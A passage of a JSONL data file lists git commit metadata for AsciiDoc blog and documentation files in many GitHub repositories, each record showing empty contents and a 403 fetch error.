2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e237e7a6c2bdad40a94d4396dfd953a0fe2c7f3","subject":"Renamed '_posts\/2018-10-14-TEST.adoc' to '_posts\/2019-01-31-My-English-Title.adoc'","message":"Renamed '_posts\/2018-10-14-TEST.adoc' to '_posts\/2019-01-31-My-English-Title.adoc'","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5312c3b1e3d653c18906dae97ff0789c584231f1","subject":"Update 2016-10-05-Episode-74-Antisocial-Arachnids-and-Full-Service-Servos.adoc","message":"Update 2016-10-05-Episode-74-Antisocial-Arachnids-and-Full-Service-Servos.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-10-05-Episode-74-Antisocial-Arachnids-and-Full-Service-Servos.adoc","new_file":"_posts\/2016-10-05-Episode-74-Antisocial-Arachnids-and-Full-Service-Servos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd3247cd6cc571bfb485b4ef7c9a268a52529ab7","subject":":sparkles: npm debug","message":":sparkles: npm debug\n","repos":"syon\/refills","old_file":"src\/refills\/javascript\/npm-debug.adoc","new_file":"src\/refills\/javascript\/npm-debug.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c3535a9129a8eba60f76a698a459744e94be228","subject":"y2b create post Orbita Voyager Travel Watchwinder Unboxing \\u0026 Overview","message":"y2b create post Orbita Voyager Travel Watchwinder Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-09-Orbita-Voyager-Travel-Watchwinder-Unboxing--u0026-Overview.adoc","new_file":"_posts\/2011-01-09-Orbita-Voyager-Travel-Watchwinder-Unboxing--u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9acec8756c58dd588e4564363135b8b994ef057f","subject":"Update 2015-06-18-Hello-World.adoc","message":"Update 2015-06-18-Hello-World.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-Hello-World.adoc","new_file":"_posts\/2015-06-18-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aadd4f421e8ef166fabb631043e4c320bbb3f557","subject":"Update 2019-01-06-G-A-S-Slack.adoc","message":"Update 
2019-01-06-G-A-S-Slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-06-G-A-S-Slack.adoc","new_file":"_posts\/2019-01-06-G-A-S-Slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d917eaeb89e255e90a27effa365085bd58255cd","subject":"y2b create post Virtual Reality for iPhone or Android!","message":"y2b create post Virtual Reality for iPhone or Android!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-15-Virtual-Reality-for-iPhone-or-Android.adoc","new_file":"_posts\/2016-07-15-Virtual-Reality-for-iPhone-or-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb6c780d22c3eb4f87e56f78df40aa6ed9b30b2c","subject":"fix spelling mistake","message":"fix spelling mistake\n","repos":"danmack\/resume","old_file":"interests.adoc","new_file":"interests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51bfecc7cb9f00208887e3bf5e3684c4645fa47b","subject":"[DOCS] fixes word usage in allocation awareness docs","message":"[DOCS] fixes word usage in allocation awareness 
docs\n","repos":"C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fernandozhu\/elasticsearch,bawse\/elasticsearch,rajanm\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,i-am-Nathan\/elasticsearch,MisterAndersen\/elasticsearch,spiegela\/elasticsearch,ZTE-PaaS\/elasticsearch,nilabhsagar\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,LewayneNaidoo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,bawse\/elasticsearch,scottsom\/elasticsearch,JackyMai\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,rajanm\/elasticsearch,jprante\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticsearch,nazarewk\/elasticsearch,Shepard1212\/elasticsearch,C-Bish\/elasticsearch,mikemccand\/elasticsearch,nilabhsagar\/elasticsearch,elasticdog\/elasticsearch,alexshadow007\/elasticsearch,LewayneNaidoo\/elasticsearch,gfyoung\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,umeshdangat\/elasticsearch,elasticdog\/elasticsearch,fernandozhu\/elasticsearch,mortonsykes\/elasticsearch,elasticdog\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,Helen-Zhao\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,gingerwizard\/elasticsearch,fforbeck\/elasticsearch,nilabhsagar\/elasticsearch,jimczi\/elasticsearch,sneivandt\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,MisterAndersen\/elasticsearch,JackyMai\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,mikemccand\/elasticsearch,fernandozhu\/elasticsearch,LeoYao\/elasticsearch,GlenRSmith\/elasticsearch,henakamaMSFT\/elasticsearch,sneivandt\/elasticsearch,lks21c\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,fernandozhu\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,IanvsPoplicola\/elasticsearch,GlenRSmith\/elasticsearch,Shepard1212\/elasticsearch,Helen-Zhao\/elasticsearch,kalimatas\/elasticsearch,geidies\/elasticsearch,MaineC\/elasticsearch,strapdata\/elassandra,JSCooke\/elasticsearch,a2lin\/elasticsearch,maddin2016\/elasticsearch,njlawton\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,mortonsykes\/elasticsearch,HonzaKral\/elasticsearch,wuranbo\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,mortonsykes\/elasticsearch,umeshdangat\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,spiegela\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MaineC\/elasticsearch,lks21c\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,fforbeck\/elasticsearch,sneivandt\/elasticsearch,StefanGor\/elasticsearch,henakamaMSFT\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,MaineC\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s
hreejay\/elasticsearch,geidies\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,vroyer\/elasticassandra,C-Bish\/elasticsearch,mohit\/elasticsearch,obourgain\/elasticsearch,nazarewk\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,geidies\/elasticsearch,JackyMai\/elasticsearch,nazarewk\/elasticsearch,JackyMai\/elasticsearch,scottsom\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,artnowo\/elasticsearch,elasticdog\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,artnowo\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,robin13\/elasticsearch,wuranbo\/elasticsearch,fred84\/elasticsearch,fforbeck\/elasticsearch,Shepard1212\/elasticsearch,MisterAndersen\/elasticsearch,jimczi\/elasticsearch,MaineC\/elasticsearch,rlugojr\/elasticsearch,njlawton\/elasticsearch,nknize\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,geidies\/elasticsearch,strapdata\/elassandra,wenpos\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,nezirus\/elasticsearch,s1monw\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,mortonsykes\/elasticsearch,GlenRSmith\/elasticsearch,njlawton\/elasticsearch,Shepard1212\/elasticsearch,vroyer\/elassandra,qwerty4030\/elasticsearch,obourgain\/elasticsearch,LewayneNaidoo\/elasticsearch,i-am-Nathan\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,i-am-Nathan\/elasticsearch,nknize\/elasticsearch,njlawton\/elasticsearch,masaruh\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fforbeck\/elasticsearch,alexshadow007\/elasticsearch,wuranbo\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,vroyer\/elasticassandra,uschindler\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elassandra,jprante\/elasticsearch,fernandozhu\/elasticsearch,JSCooke\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,mikemccand\/elasticsearch,rajanm\/elasticsearch,bawse\/elasticsearch,JSCooke\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,i-am-Nathan\/elasticsearch,scottsom\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,Shepard1212\/elasticsearch,scorpionvicky\/elasticsearch,nezirus\/elasticsearch,glefloch\/elasticsearch,scorpionvicky\/elasticsearch,rlugojr\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,robin13\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,shreejay\/elasticsearch,nazarewk\/elasticsearch,artnowo\/elasticsearch,IanvsPoplicola\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,rlugojr\/elasticsearch,glefloch\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,henakamaMSFT\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elas
ticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,lks21c\/elasticsearch,s1monw\/elasticsearch,njlawton\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,s1monw\/elasticsearch,a2lin\/elasticsearch,winstonewert\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,geidies\/elasticsearch,nilabhsagar\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,alexshadow007\/elasticsearch,henakamaMSFT\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,rlugojr\/elasticsearch,JackyMai\/elasticsearch,shreejay\/elasticsearch,mikemccand\/elasticsearch,LewayneNaidoo\/elasticsearch,MisterAndersen\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,gingerwizard\/elasticsearch,ZTE-PaaS\/elasticsearch,i-am-Nathan\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,artnowo\/elasticsearch,jprante\/elasticsearch,wenpos\/elasticsearch,umeshdangat\/elasticsearch,fred84\/elasticsearch,winstonewert\/elasticsearch,glefloch\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,umeshdangat\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,a2lin\/elasticsearch,henakamaMSFT\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,obourgain\/elasticsearch,uschindler\/elasticsearch,Helen-Zhao\/elasticsearch,glefloch\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,bawse\/elasticsearch,artnowo\/elasticsearch,vroyer\/elassandra,winstonewert\/elasticsearch,kalimatas\/elasticsearch","old_file":"docs\/reference\/modules\/cluster\/allocation_awareness.asciidoc","new_file":"docs\/reference\/modules\/cluster\/allocation_awareness.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57477b98344d75de28fc77e35e87830a77ae9cb3","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da7f9363c9ce063a0f26971006a3ef2bb37777aa","subject":"Update 2016-04-20-Zen-Studios-Drops-a-Teaser-Trailer-For-Alien-Isolation.adoc","message":"Update 2016-04-20-Zen-Studios-Drops-a-Teaser-Trailer-For-Alien-Isolation.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-04-20-Zen-Studios-Drops-a-Teaser-Trailer-For-Alien-Isolation.adoc","new_file":"_posts\/2016-04-20-Zen-Studios-Drops-a-Teaser-Trailer-For-Alien-Isolation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"367199797c3cdf42a3e6db014454820f8737a9fd","subject":"Publish 2016-08-09.adoc","message":"Publish 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-08-09.adoc","new_file":"2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08e3c1f2b3f2e4c90893b32ccbcdd8a710fc7d12","subject":"Works on documentation","message":"Works on documentation\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/manpage\/libndrxxapq.adoc","new_file":"doc\/manpage\/libndrxxapq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"0cdddd7e1253c299bc985feafec9acc4a795f856","subject":"y2b create post Color Shield for iPhone 4 \\u0026 4S Review","message":"y2b create post Color Shield for iPhone 4 \\u0026 4S Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-02-Color-Shield-for-iPhone-4-u0026-4S-Review.adoc","new_file":"_posts\/2011-12-02-Color-Shield-for-iPhone-4-u0026-4S-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"108352942b46df0d3cf5f25a685d0693d29e2a43","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/11\/18\/deref.adoc","new_file":"content\/news\/2022\/11\/18\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f1b3452d068adea255ef94273357a0d8f2db33b3","subject":"Create ideas.adoc","message":"Create ideas.adoc","repos":"community-graph\/documentation","old_file":"ideas.adoc","new_file":"ideas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/community-graph\/documentation.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94187f46cdc218687a68cfec8d050556b1bad2d9","subject":"Update 2017-02-17-Dragon-curve-is-drawn-with-ps5js-while-learning-recursive-algorithm.adoc","message":"Update 2017-02-17-Dragon-curve-is-drawn-with-ps5js-while-learning-recursive-algorithm.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-17-Dragon-curve-is-drawn-with-ps5js-while-learning-recursive-algorithm.adoc","new_file":"_posts\/2017-02-17-Dragon-curve-is-drawn-with-ps5js-while-learning-recursive-algorithm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"536137e2a345bc34edc8989eb3b1245eefd7e5fd","subject":"Update 2016-06-12-My-first-post.adoc","message":"Update 2016-06-12-My-first-post.adoc","repos":"thesagarsutar\/hubpress,thesagarsutar\/hubpress,thesagarsutar\/hubpress,thesagarsutar\/hubpress","old_file":"_posts\/2016-06-12-My-first-post.adoc","new_file":"_posts\/2016-06-12-My-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thesagarsutar\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ac0e9fdbff7cdfb600db94fa89b2c49be409109","subject":"Update 2018-07-28-New-Milestone.adoc","message":"Update 2018-07-28-New-Milestone.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-28-New-Milestone.adoc","new_file":"_posts\/2018-07-28-New-Milestone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12f21dca133ea199c3f960d96238871b12df3bb0","subject":"Update 2019-01-31-java-language.adoc","message":"Update 2019-01-31-java-language.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-java-language.adoc","new_file":"_posts\/2019-01-31-java-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb38260078f071bf386c06b5cd5f1f6ee050f4ed","subject":"Publish 2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","message":"Publish 2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","new_file":"2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e95ae5a43074f3963283df669285abbe08fd7b30","subject":"Update 2019-01-31-Dired-to-clipboard.adoc","message":"Update 2019-01-31-Dired-to-clipboard.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2019-01-31-Dired-to-clipboard.adoc","new_file":"_posts\/2019-01-31-Dired-to-clipboard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cc38918a21bc9aab4d90c21e8183f9a811116c0","subject":"y2b create post Android Ice Cream Sandwich Review (Nexus S)","message":"y2b create post Android Ice Cream Sandwich Review (Nexus 
S)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-26-Android-Ice-Cream-Sandwich-Review-Nexus-S.adoc","new_file":"_posts\/2011-10-26-Android-Ice-Cream-Sandwich-Review-Nexus-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db566c4cb76a13e1e4da34b23a3274c6a6d6c509","subject":"Update 2017-09-07-Semi-automatic-Jenkins-upgrade-on-Windows.adoc","message":"Update 2017-09-07-Semi-automatic-Jenkins-upgrade-on-Windows.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-09-07-Semi-automatic-Jenkins-upgrade-on-Windows.adoc","new_file":"_posts\/2017-09-07-Semi-automatic-Jenkins-upgrade-on-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"758db103bf6adff3cde0fec1bb04d97a4ae4e520","subject":"Update 2016-08-19-Hello-everybody.adoc","message":"Update 2016-08-19-Hello-everybody.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be009a9bdf2471a2ffceeac479ec2810fdfc91e6","subject":"Update 2016-10-25-Exame-de-Rotina.adoc","message":"Update 2016-10-25-Exame-de-Rotina.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2016-10-25-Exame-de-Rotina.adoc","new_file":"_posts\/2016-10-25-Exame-de-Rotina.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62717e6d680d23828478c016ba2c7627ab1ee42a","subject":"Update 2016-10-29-Getting-Started.adoc","message":"Update 2016-10-29-Getting-Started.adoc","repos":"laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io","old_file":"_posts\/2016-10-29-Getting-Started.adoc","new_file":"_posts\/2016-10-29-Getting-Started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laposheureux\/laposheureux.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"babffad9ac2256746653068a897225fec4d25d61","subject":"Add README-ja.adoc","message":"Add 
README-ja.adoc\n","repos":"locnh\/locnh.github.io,KozytyPress\/kozytypress.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,wayr\/wayr.github.io,StefanBertels\/stefanbertels.github.io,iwakuralai-n\/badgame-site,apalkoff\/apalkoff.github.io,angilent\/angilent.github.io,tedbergeron\/hubpress.io,swhgoon\/blog,scholzi94\/scholzi94.github.io,darkfirenze\/darkfirenze.github.io,jborichevskiy\/jborichevskiy.github.io,mrcouthy\/mrcouthy.github.io,olivierbellone\/olivierbellone.github.io,lerzegov\/lerzegov.github.io,AlonsoCampos\/AlonsoCampos.github.io,dakeshi\/dakeshi.github.io,sitexa\/hubpress.io,Nil1\/Nil1.github.io,Brzhk\/Brzhk.github.io,hapee\/hapee.github.io,demohi\/blog,alchemistcookbook\/alchemistcookbook.github.io,caryfitzhugh\/caryfitzhugh.github.io,neomobil\/neomobil.github.io,crazyrandom\/crazyrandom.github.io,lxjk\/lxjk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,icthieves\/icthieves.github.io,devopSkill\/devopskill.github.io,darsto\/darsto.github.io,raisedadead\/hubpress.io,jaredmorgs\/jaredmorgs.github.io,regdog\/regdog.github.io,dannylane\/dannylane.github.io,MartinAhrer\/martinahrer.github.io,dfjs\/dfjs.github.io,shutas\/shutas.github.io,deformat\/deformat.github.io,neocarvajal\/neocarvajal.github.io,anshu92\/blog,woehrl01\/woehrl01.hubpress.io,ioisup\/ioisup.github.io,chrizco\/chrizco.github.io,nullbase\/nullbase.github.io,realraindust\/realraindust.github.io,lametaweb\/lametaweb.github.io,blogforfun\/blogforfun.github.io,kay\/kay.github.io,bretonio\/bretonio.github.io,deivisk\/deivisk.github.io,AppHat\/AppHat.github.io,Dekken\/dekken.github.io,gardenias\/sddb.com,zouftou\/zouftou.github.io,jrhea\/jrhea.gith